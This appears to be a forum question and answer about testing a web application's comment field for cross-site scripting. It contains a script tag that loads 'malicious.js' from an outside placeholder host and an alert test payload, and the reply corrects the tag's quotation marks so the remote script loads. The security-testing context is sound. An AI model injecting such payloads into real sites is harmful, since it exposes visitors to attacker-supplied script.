I'm testing an web application against xss attack. In that there are list of events and each one has comment area, in one of the event, i inserted this script,
<script src=”http://www.example.com/malicious.js”></script >
The event showed a flag, that there is a comment, but it is not getting displayed. The problem here is whenever i click on that event, the app crashes, and the browser gives "Recover page".
But in Chrome, it is accepting that script, displays it as empty comment(" "), and its not getting crashed why?
I reset the browser settings in IE, but the same issue appears. So is that due to Chrome not processing the virus(not sure), or IE processes it?
And i tried this script,
<script >alert("Hello");</script >
Both browsers acts in a same ways without crashing.
So can you please give me an idea of whats happening in it?
You appear to be using some non-standard quotation marks. Try replacing with this:
<script src="http://www.example.com/malicious.js"></script>